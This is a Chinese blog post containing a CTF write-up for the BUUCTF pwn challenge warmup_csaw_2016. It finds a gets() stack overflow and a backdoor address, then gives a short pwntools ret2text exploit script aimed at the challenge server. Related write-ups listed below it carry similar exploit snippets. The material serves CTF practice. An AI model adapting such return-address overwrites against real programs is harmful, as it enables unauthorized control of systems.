【BUUCTF-PWN】3-warmup_csaw_2016

于 2024-07-04 23:51:12 发布
阅读量179 收藏
点赞数 1
分类专栏: CTF-PWN 文章标签: CTF BUUCTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43785509/article/details/140192972
版权

checksec检查是64位,未开启任何保护
在这里插入图片描述
运行效果如下:
在这里插入图片描述

IDA打开反编译main函数:
在这里插入图片描述

gets()函数存在栈溢出
寻找后门函数:
直接字符串查找system或者flag
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

后门函数的地址是0x40060D
在这里插入图片描述

再看一下变量在栈中的位置:
在这里插入图片描述

写exp:

#!/usr/bin/python            
 
from pwn import*
 
io=remote("node5.buuoj.cn",26676)
payload=b'a'*(0x40+8)+p64(0x40060D+1)
io.sendline(payload)
io.interactive()

执行结果:
在这里插入图片描述

燕麦葡萄干
关注
专栏目录
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3275
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1260
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 414
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf--pwn-warmup
weixin_45427676的博客
09-19 532
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1026
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
BUUCTF|PWN-warmup_csaw_2016-WP
l2645470582_的博客
07-28 472
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec warmup_csaw_2016 3、我们看到该文件是64位的文件,我们用64位IDA打开该文件 3.1、shift+f12查看该文件的关键字符串 3.2、双击关键字符串,f5进入反编译代码区 查看main函数 3.3、我们看到s和v5字符数组,查看他们所占字节 v5有溢出: r(返回地址): 关键字符串函数地址 4、编译代码 #i...
buuctf PWN warmup_csaw_2016
wp568的博客
10-04 428
发现函数gets(v5),是栈溢出。查看程序起始地址0x40060D。发现直接有显示flag函数。看到v5占用64个位置。下载附件,IDA查看。
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1492
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF pwn前三道
2301_80470992的博客
12-21 1030
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。但是可以发现buffer就只有0xF字节的大小,输入超过0xF个字节以后,你就会溢出,你会覆盖返回地址。代码分析:俩个write函数输出,然后sprintf函数利用%p将sub_40060函数地址(其实就是system函数)打印出来放到s里面,然后由write函数打印出来,由于是64位所以write那是9,存在溢出条件,接下来就是要找后门函数地址了。
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1353
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 377
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
buuctf warmup
doudoudedi
01-28 576
函数很少我们需要控制寄存器的值来执行内核调用(int 80) 思路 先将字符串/bin/sh写入程序32位的程序用栈传递参数所以我们有充足的空间进行ROP然后跳回程序开始然后将再次读入/bin/sh然后控制好寄存器的值即打开execve的系统调用(这里函数最后的ret会使栈向上提了4个byte所以寄存器控制好了)~~ exp: #!/usr/bin/python2 from pwn import ...
BUUCTF-WarmUp
硫酸超的博客
11-20 5180
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
buuctf-WarmUp
m0_62094846的博客
03-23 157
查看源代码,看到source.php 先看这段 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br&g..
buuctfWarmUp
qq_38634097的博客
04-17 598
通过代码审计,我们知道了需要满足三个条件,前两个为file不为空且为字符串,那么可以构造pyload为:?file=hint.php.(我们已经知道source.php文件源码是什么了,所以直接用hint.php即可)我们已知,hint.php在白名单,flag在ffffllllaaaagggg,mb_strpos($page . '?结合已知条件,再次进行代码审计,寻找突破口。开题一张笑脸,无他,查看网页源码,看到提示source.php,在url后加/source.php,打开结果如下,
BUUCTF——Warmup
weixin_44866139的博客
04-30 1415
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
buuctf——Warmup
qq_51796436的博客
03-05 1212
打开题目F12有注释source.php 那访问网址:题目/source.php出现如下题目代码:
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 490
buuctf pwn
warmupbuuctf-pwn
m0_73756460的博客
07-17 232
warmupbuuctf-pwn
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值